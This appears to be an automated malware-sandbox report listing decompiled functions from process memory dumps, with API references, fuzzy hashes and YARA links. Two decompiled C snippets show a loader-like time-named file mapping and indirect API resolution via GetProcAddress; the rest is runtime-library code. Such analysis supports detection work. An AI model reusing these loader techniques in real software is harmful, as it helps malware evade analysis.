Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e1288afa835fd4c7d3b3875288687cdc784e4a45fdbcaed62dc58e751d143b
Instruction ID: fab856745e61aafe028194d5cca3168a18b08f21658e83dac7dbe6dc952cc962
Opcode Fuzzy Hash: f5e1288afa835fd4c7d3b3875288687cdc784e4a45fdbcaed62dc58e751d143b
Instruction Fuzzy Hash: 35C17F78D0838A9BDF01DFA9C844FBD7BB4AF1A314F254149E914A7381C7349D41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D45102F, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D45102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D452100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d454150;
				_push(_t15 + 0x6d45505e);
				_push(_t15 + 0x6d455054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D4520FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6d454140, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6d45102f
0x6d451038
0x6d45103c
0x6d451042
0x6d451047
0x6d45104c
0x6d45104f
0x6d451052
0x6d451057
0x6d451058
0x6d45105b
0x6d451066
0x6d45106d
0x6d451071
0x6d451073
0x6d451074
0x6d451077
0x6d45107c
0x6d451086
0x6d451088
0x6d451088
0x6d4510a2
0x6d4510a6
0x6d4510f6
0x6d4510a8
0x6d4510b1
0x6d4510c7
0x6d4510cf
0x6d4510e1
0x6d4510e5
0x00000000
0x00000000
0x6d4510d1
0x6d4510d4
0x6d4510d9
0x6d4510db
0x6d4510db
0x6d4510bc
0x6d4510be
0x6d4510e7
0x6d4510e8
0x6d4510e8
0x6d4510b1
0x6d4510fe

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6D45103C
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D451052
_snwprintf.NTDLL ref: 6D451077
CreateFileMappingW.KERNEL32(000000FF,6D454140,00000004,00000000,?,?), ref: 6D45109C
GetLastError.KERNEL32 ref: 6D4510B3
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6D4510C7
GetLastError.KERNEL32 ref: 6D4510DF
CloseHandle.KERNEL32(00000000), ref: 6D4510E8
GetLastError.KERNEL32 ref: 6D4510F0

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 52c4775ef3b38930e07559d0ea66936b3d22608f78a2d3f08662d636e95bfda0
Instruction ID: ac15928bc50e7527367a61828a1be81c28a2ebf7743cbf6344d735e8b34e6d8a
Opcode Fuzzy Hash: 52c4775ef3b38930e07559d0ea66936b3d22608f78a2d3f08662d636e95bfda0
Instruction Fuzzy Hash: 78217F72500248BFDB11AFA8CC88FEE7BB9EB49B54F218225F615D7240D730DD658BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF177, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

_memcmp.LIBVCRUNTIME ref: 6D4BF421
_free.LIBCMT ref: 6D4BF492
_free.LIBCMT ref: 6D4BF4AB
_free.LIBCMT ref: 6D4BF4DD
_free.LIBCMT ref: 6D4BF4E6
_free.LIBCMT ref: 6D4BF4F2

Strings

C, xrefs: 6D4BF2DF

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: a5f72012d3fde91f84c55e98aa093ecd46f9610939b675f89215fcb16d1dae68
Instruction ID: e5cc26451342284ca9e30399d7b24bc33520185a7663a7318929f6840039b9d8
Opcode Fuzzy Hash: a5f72012d3fde91f84c55e98aa093ecd46f9610939b675f89215fcb16d1dae68
Instruction Fuzzy Hash: BBC12B7990621A9FDB24CF18C884FADB7B4FB59304F6185AAD90DA7350D731AE90CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8870, Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C88F2
_free.LIBCMT ref: 6D4C8916
_free.LIBCMT ref: 6D4C8A9D
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: f3a717610ddb93d3c3bbac6b876ce254568b29177abf97c867122c4c5d29ef98
Instruction ID: 919b703ca97fa5f29b14318156a3eb085a2b0109bd7dabcb1f97c2eb38637080
Opcode Fuzzy Hash: f3a717610ddb93d3c3bbac6b876ce254568b29177abf97c867122c4c5d29ef98
Instruction Fuzzy Hash: E6C128799082069FDB15DF79C840FAE7BB8AF42314F2541AEE59497341E7318E41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BECF9, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

_free.LIBCMT ref: 6D4BEE04
_free.LIBCMT ref: 6D4BEE1B
_free.LIBCMT ref: 6D4BEE3A
_free.LIBCMT ref: 6D4BEE55
_free.LIBCMT ref: 6D4BEE6C

Strings

DnPm, xrefs: 6D4BEDDE

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID: DnPm
API String ID: 3033488037-4274239213
Opcode ID: a10aa1d19e859c581cb0e343fb6fa6c850f48d114b6c3c819f7d8e5cdf5a56e0
Instruction ID: 840883cf38a15c5203f375ba5df4977e8554e6b8ab4b1da75fd05d0cba5d0c8f
Opcode Fuzzy Hash: a10aa1d19e859c581cb0e343fb6fa6c850f48d114b6c3c819f7d8e5cdf5a56e0
Instruction Fuzzy Hash: 1551B175A04305AFEB11CF69C880F6A77F4EF99724F2145ADEA09DB250E731DE418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C240C, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,6D4C2B81,?,?,?,?,?,?), ref: 6D4C244E
__fassign.LIBCMT ref: 6D4C24C9
__fassign.LIBCMT ref: 6D4C24E4
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6D4C250A
WriteFile.KERNEL32(?,?,00000000,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2529
WriteFile.KERNEL32(?,?,00000001,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2562

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c214aa73fece6ee32c3bf360dc021a9e6054e817e94aff7fcb7fafe77c047ad7
Instruction ID: 97f2cdaded1060c31db009cf59c5982260663a49d18d2682c6d76897284216c5
Opcode Fuzzy Hash: c214aa73fece6ee32c3bf360dc021a9e6054e817e94aff7fcb7fafe77c047ad7
Instruction Fuzzy Hash: EF519075A00249AFDF10CFA8C895FEEBBF8EF49300F15412AE955E7241DB709941CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CCA10, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CC6F6: _free.LIBCMT ref: 6D4CC71F

_free.LIBCMT ref: 6D4CCA5E

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CCA69
_free.LIBCMT ref: 6D4CCA74
_free.LIBCMT ref: 6D4CCAC8
_free.LIBCMT ref: 6D4CCAD3
_free.LIBCMT ref: 6D4CCADE
_free.LIBCMT ref: 6D4CCAE9

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction ID: 05dd7c52da67924be9ad83aaee827d802a456890a2019beb5be96e66a56c2e14
Opcode Fuzzy Hash: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction Fuzzy Hash: 4511AC79A49B08AAEA20EBB0CD05FCB779EAF00304F45081CB7A9B6050CB64FC4086C2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BFDE2, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000,6D47312A,?,?,?,6D4C0033,00000001,00000001,9F418D08), ref: 6D4BFE3C
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6D4C0033,00000001,00000001,9F418D08,00000000,?,?), ref: 6D4BFEC2
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,9F418D08,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D4BFFBC
__freea.LIBCMT ref: 6D4BFFC9

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

__freea.LIBCMT ref: 6D4BFFD2
__freea.LIBCMT ref: 6D4BFFF7

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 54114cdd00808bfa1e4ad4d19ebf83486203911e90a795f74954c7ed4388e79c
Instruction ID: 75019a6c6965533f8467b34cda28c3bd6eeacaef6440296edf7e4a85fdb1b704
Opcode Fuzzy Hash: 54114cdd00808bfa1e4ad4d19ebf83486203911e90a795f74954c7ed4388e79c
Instruction Fuzzy Hash: C9510336A11217ABEB158E64CC40EBB7BA9EB56754F21462EFD0CD7280EB35DC40C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B526F, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6D4B529B
__cftoe.LIBCMT ref: 6D4B52CD

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 8172a8b63186a372d772885238ed5244bc8b4f97155fe7c7111c67e815979840
Instruction ID: 77aa08f2837dde20e0125cb36e60d72b669232d6ba81a54a10bc59d693d25092
Opcode Fuzzy Hash: 8172a8b63186a372d772885238ed5244bc8b4f97155fe7c7111c67e815979840
Instruction Fuzzy Hash: F951F436908206ABDB148B69DC40FBEB7B8AF59364F61421DE924A6391DB71CD00CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 6D451A0F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D451A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D451DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d454150 + 0x6d455014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d454150 + 0x6d455151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D451DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d454150 + 0x6d455161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d454150 + 0x6d455174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d454150 + 0x6d455189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d454150 + 0x6d45519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D451EB5(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6d451a1d
0x6d451a21
0x6d451ae2
0x6d451a27
0x6d451a3f
0x6d451a4e
0x6d451a55
0x6d451a59
0x6d451a5c
0x6d451ada
0x6d451adb
0x6d451a5e
0x6d451a6b
0x6d451a6f
0x6d451a72
0x00000000
0x6d451a74
0x6d451a81
0x6d451a85
0x6d451a88
0x00000000
0x6d451a8a
0x6d451a97
0x6d451a9b
0x6d451a9e
0x00000000
0x6d451aa0
0x6d451aad
0x6d451ab1
0x6d451ab4
0x00000000
0x6d451ab6
0x6d451abc
0x6d451ac2
0x6d451ac7
0x6d451ace
0x6d451ad1
0x00000000
0x6d451ad3
0x6d451ad6
0x6d451ad6
0x6d451ad1
0x6d451ab4
0x6d451a9e
0x6d451a88
0x6d451a72
0x6d451a5c
0x6d451af0

APIs

Part of subcall function 6D451DE1: HeapAlloc.KERNEL32(00000000,?,6D451556,00000208,00000000,00000000,?,?,?,6D4516A9,?), ref: 6D451DED

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6D451E4D,?,?,?,?,?,00000002,?,6D451401), ref: 6D451A33
GetProcAddress.KERNEL32(00000000,?), ref: 6D451A55
GetProcAddress.KERNEL32(00000000,?), ref: 6D451A6B
GetProcAddress.KERNEL32(00000000,?), ref: 6D451A81
GetProcAddress.KERNEL32(00000000,?), ref: 6D451A97
GetProcAddress.KERNEL32(00000000,?), ref: 6D451AAD

Part of subcall function 6D451EB5: memset.NTDLL ref: 6D451F34

Memory Dump Source

Source File: 00000002.00000002.908012543.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000002.00000002.908006075.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908018975.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.908028737.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.908034339.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 4a57d79961c0205b90ff4bcc98c66f82fc5445e9ef0ebfabb9fe0ab942373770
Instruction ID: 27c62b1c31635cc2c2168556110bbe497fcf9e7c6e12cce6ef880a9de927b32a
Opcode Fuzzy Hash: 4a57d79961c0205b90ff4bcc98c66f82fc5445e9ef0ebfabb9fe0ab942373770
Instruction Fuzzy Hash: B2213EB160060EAFDB51EFA9C884EA67BF8FF096407018515E515CB314E771ED22CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDE57, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
_free.LIBCMT ref: 6D4BDE8E
_free.LIBCMT ref: 6D4BDEB6
SetLastError.KERNEL32(00000000), ref: 6D4BDEC3
SetLastError.KERNEL32(00000000), ref: 6D4BDECF
_abort.LIBCMT ref: 6D4BDED5

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 22af50774857a2a5aa1e9e456ce518be9d5f51ab2f795a4909139ef10ca80073
Instruction ID: 5379e335cb7943bf93024828e80a1b306c7192e2a0354b798b4b247f66b3b47a
Opcode Fuzzy Hash: 22af50774857a2a5aa1e9e456ce518be9d5f51ab2f795a4909139ef10ca80073
Instruction Fuzzy Hash: 0BF0F43D508E0126DB0256399D08F2B26769FF67AAF37415DF61A92680EF398C0280B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D479011, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47901D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47902B

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,?,6D4915E0,6D55AA10,6D55AA10,6D55AA10,?,?,?,?,?,6D4915E0,6D528C7C,6D531C84), ref: 6D492554

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47903D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47904B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47905D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47906B

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument$ExceptionRaise
String ID:
API String ID: 2590316965-0
Opcode ID: 24b84a920771dbfe7581a91776ea1be60bf48a8b59ad12318e642cec34d55335
Instruction ID: e853d611abc77f117fb1495fa93b2d0f8dfa1243752263ca532ed9fdda3aa22b
Opcode Fuzzy Hash: 24b84a920771dbfe7581a91776ea1be60bf48a8b59ad12318e642cec34d55335
Instruction Fuzzy Hash: ADF01275C0424C77CF18EAF6D895CDDBB7CAA04104F814465AB10A6451EF71AB1DD7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C6222, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd63963b42c2707cf47d777c01cc036530413bb1ee24246ab2dcb1eaea942323
Instruction ID: 59c9bfc6b0aa7a6701e9cf71c177da828ed1b7120ff8ddd4112a157fef5c3bf3
Opcode Fuzzy Hash: cd63963b42c2707cf47d777c01cc036530413bb1ee24246ab2dcb1eaea942323
Instruction Fuzzy Hash: 9871BF399042179BDB21CF59C844FBFBB75EF45314F258229E96467260DB708C42CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8A45, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8A9D

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 3a3f3d8f6a6a2c51f939c22875e575ad35381ad612fe2ee06a9c6d488356bf73
Instruction ID: 2b89349fec85de3f5a443b8285afcf0bb47ee99fe55d698883624f822fbcaf51
Opcode Fuzzy Hash: 3a3f3d8f6a6a2c51f939c22875e575ad35381ad612fe2ee06a9c6d488356bf73
Instruction Fuzzy Hash: 4151EBB9904209AFDF10DF6ACC84D7E77B8EF45314B22426FE56497690E7309E41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CF76, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CF87
std::_Facet_Register.LIBCPMT ref: 6D48CFD8
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CFF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48D016
_Mpunct.LIBCPMT ref: 6D48D049

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_MpunctRegisterThrow
String ID:
API String ID: 3611545457-0
Opcode ID: 948f3da73a5ab42383b73c139177c820eff39986b3a303f6891319c26d79f19f
Instruction ID: 3cda77f413a03b387522f7995ad9991772a050b0cafb8a2872b8494a2c626318
Opcode Fuzzy Hash: 948f3da73a5ab42383b73c139177c820eff39986b3a303f6891319c26d79f19f
Instruction Fuzzy Hash: 6121A93180425A9BCF05CFA5C840EEEBBB1AF84354F22440EEA14AB391DF70DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481118, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D481129
std::_Facet_Register.LIBCPMT ref: 6D48117A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48119A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4811B8
_Mpunct.LIBCPMT ref: 6D4811EB

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_MpunctRegisterThrow
String ID:
API String ID: 3611545457-0
Opcode ID: 2f87456b5d8d9912f162e3722e84bf38f9d2a59eff42c43dfa5ab054bd23b402
Instruction ID: 6420f1ee8e18ce224156004517cb5ab3ff3272c5042cc890e9c317a93406412b
Opcode Fuzzy Hash: 2f87456b5d8d9912f162e3722e84bf38f9d2a59eff42c43dfa5ab054bd23b402
Instruction Fuzzy Hash: B521BA758042199BCF15CFA4C840EEE7BB5AF89354F26040EEA24AB390DB70DE01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47911C, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47912D
codecvt.LIBCPMT ref: 6D479167
std::_Facet_Register.LIBCPMT ref: 6D47917E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47919E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4791BC

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: e99a8c89a8b5d2748eb17b2589cfae55cd0fce491789b0c762a94121f1c97e7b
Instruction ID: 645d249a41a9631d72cb5606b3d4857c1438540ce97310e87ab6846c44051db3
Opcode Fuzzy Hash: e99a8c89a8b5d2748eb17b2589cfae55cd0fce491789b0c762a94121f1c97e7b
Instruction Fuzzy Hash: D021C3729082299BCF14DF95C854EEE7779AF85764F22040DE601AB390DF759E01C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47727A, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47728B
codecvt.LIBCPMT ref: 6D4772C5
std::_Facet_Register.LIBCPMT ref: 6D4772DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4772FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47731A

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: 5407325410a7a527bf1b44f60293f70f5ff5af0137a4e750f4a0b886aa52380e
Instruction ID: 0bd3d47f7ed6ddeda4de81d8ae610c9b0d9d70409925519696c9f92bf887b630
Opcode Fuzzy Hash: 5407325410a7a527bf1b44f60293f70f5ff5af0137a4e750f4a0b886aa52380e
Instruction Fuzzy Hash: FE21CFB1D082299BCF14DB95C850EEE77B5AF44214F22000EEA10AB390DF709E01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BB3E, Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BB4F
numpunct.LIBCPMT ref: 6D47BB89
std::_Facet_Register.LIBCPMT ref: 6D47BBA0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BBC0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BBDE

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrownumpunct
String ID:
API String ID: 2501072427-0
Opcode ID: 1669d27aa2d8d7e715dbed35b4c2a0372379070c545e277fd7b3e86135e4e02e
Instruction ID: 8a6d1a5ecbb88621c7914215708fd4d5eb66293510f8b4186be49610b3d9ba94
Opcode Fuzzy Hash: 1669d27aa2d8d7e715dbed35b4c2a0372379070c545e277fd7b3e86135e4e02e
Instruction Fuzzy Hash: 4D11CA319042199BCF18CF64D844EEE7BB4BF85328F22441DEA14AB390DB74DE058BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48056C, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48057D
ctype.LIBCPMT ref: 6D4805B7
std::_Facet_Register.LIBCPMT ref: 6D4805CE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4805EE
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48060C

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowctype
String ID:
API String ID: 1081823724-0
